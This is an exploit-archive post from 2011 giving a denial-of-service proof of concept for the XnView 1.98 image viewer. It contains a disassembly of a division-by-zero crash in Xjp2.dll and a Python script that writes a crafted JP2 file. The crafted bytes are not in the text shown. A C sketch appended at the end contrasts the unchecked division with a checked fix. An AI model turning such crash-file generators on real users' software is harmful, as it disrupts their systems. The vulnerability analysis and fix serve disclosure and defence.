
XnView 1.98 Denial Of Service Proof Of Concept

Posted on 20 June 2011

# done by BraniX
# found: 2011.06.19
# published: 2011.06.20
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional

# App: XnView 1.98 (latest version)
# App Url: http://www.xnview.com
# xnview.exe MD5: ebe200d81a095d296e94e887dc40e607
# Xjp2.dll   MD5: 0c831c090f5a723d44bb641b175ca0e6

# DoS is caused by integer division by zero in module Xjp2.dll
# It can be triggered from:
# Local:  C:\XnView 1.98 JP2000 (Compression 50%) DoS.jp2
# Remote: \\MySecretServer\XnView 1.98 JP2000 (Compression 50%) DoS.jp2

# 1000D1C4  8A44BA 03   MOV AL,BYTE PTR DS:[EDX+EDI*4+3]
# 1000D1C8  8941 E4     MOV DWORD PTR DS:[ECX-1C],EAX
# 1000D1CB  8B56 0C     MOV EDX,DWORD PTR DS:[ESI+C]
# 1000D1CE  8D4413 FF   LEA EAX,DWORD PTR DS:[EBX+EDX-1]
# 1000D1D2  33D2        XOR EDX,EDX
# 1000D1D4  F7F3        DIV EBX                           ; div by zero
# 1000D1D6  33D2        XOR EDX,EDX
# 1000D1D8  8BE8        MOV EBP,EAX
# 1000D1DA  8B46 04     MOV EAX,DWORD PTR DS:[ESI+4]
# 1000D1DD  8D4403 FF   LEA EAX,DWORD PTR DS:[EBX+EAX-1]
# 1000D1E1  F7F3        DIV EBX
# 1000D1E3  8B59 E4     MOV EBX,DWORD PTR DS:[ECX-1C]

# Output path of the generated test file (backslashes escaped)
filepath = "C:\\XnView 1.98 JP2000 (Compression 50%) DoS.jp2"
f = open(filepath, "wb")

# File contents that trigger the division by zero in Xjp2.dll
poc = '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'

f.write(poc)
f.close()

print("Done, 1 file generated on 'C:\\' ...")
print("Open this file in XnView 1.98 and enjoy ;)")
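Each DIV EBX in the listing above follows LEA EAX,[EBX+x-1], which is the usual ceiling-division idiom (x + d - 1) / d. The C sketch below is an added example, not code from XnView or from the original advisory: it shows that pattern unchecked next to a checked form that rejects a zero divisor and does not wrap around. The function names and the reading of the operands as image dimensions and a divisor taken from the file header are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Unchecked ceiling division, the shape of LEA EAX,[EBX+EDX-1] / DIV EBX.
 * With d == 0 the x86 DIV raises a divide error and the process dies
 * (undefined behaviour in C). Large x also wraps in the addition. */
static uint32_t ceil_div_unchecked(uint32_t x, uint32_t d)
{
    return (x + d - 1) / d;
}

/* Checked form: refuses d == 0 and avoids the x + d - 1 addition,
 * so the result is correct over the whole 32-bit range. */
static bool ceil_div_checked(uint32_t x, uint32_t d, uint32_t *out)
{
    if (d == 0)
        return false;            /* malformed input: caller rejects the file */
    *out = x / d + (x % d != 0);
    return true;
}

/* Hypothetical decoder step: scale width and height by a header-supplied
 * divisor. Returns 0 on success, -1 if the header must be rejected. */
static int scale_dimensions(uint32_t width, uint32_t height, uint8_t divisor,
                            uint32_t *out_w, uint32_t *out_h)
{
    if (!ceil_div_checked(width, divisor, out_w) ||
        !ceil_div_checked(height, divisor, out_h))
        return -1;
    return 0;
}

int main(void)
{
    uint32_t w = 0, h = 0;
    /* Constructed sample values, not taken from the PoC file. */
    printf("unchecked 641/2 -> %u\n", (unsigned)ceil_div_unchecked(641, 2));
    printf("divisor 2 -> rc %d\n", scale_dimensions(641, 480, 2, &w, &h));
    printf("divisor 0 -> rc %d\n", scale_dimensions(641, 480, 0, &w, &h));
    return 0;
}
```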

 
